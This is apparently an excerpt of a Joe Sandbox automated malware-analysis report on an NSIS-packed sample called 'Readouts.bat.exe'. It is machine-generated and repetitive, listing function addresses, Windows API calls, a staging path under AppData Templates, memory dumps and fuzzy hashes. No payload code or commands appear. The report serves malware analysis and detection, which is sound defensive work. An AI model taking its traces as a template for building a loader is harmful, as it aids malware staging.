SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon
API String ID: 1892508949-85625676
Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrC488.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E

Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(007F6210), ref: 00401BE7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9

Strings

Call, xrefs: 00401B9E, 00401BA4, 00401BBE

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD

Function 6FBF2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6FBF2B33
GetLastError.KERNEL32 ref: 6FBF2C3A

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 7c844352cb45b65c79d488ee86de53779847e43581be336f3dc720f13f007625
Instruction ID: 909c2db3e5784ae94d09f4610c0b6046a0d7724042c3bc496517c0675116a90a
Opcode Fuzzy Hash: 7c844352cb45b65c79d488ee86de53779847e43581be336f3dc720f13f007625
Instruction Fuzzy Hash: 05515C765076C4EFDB24DFB5FA40B5D3BA5FB45328F10442AD804CB291D738A4AB8B51

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrC488.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A

Function 00405C61 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CBA
GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CCA

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D

Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Memory Dump Source

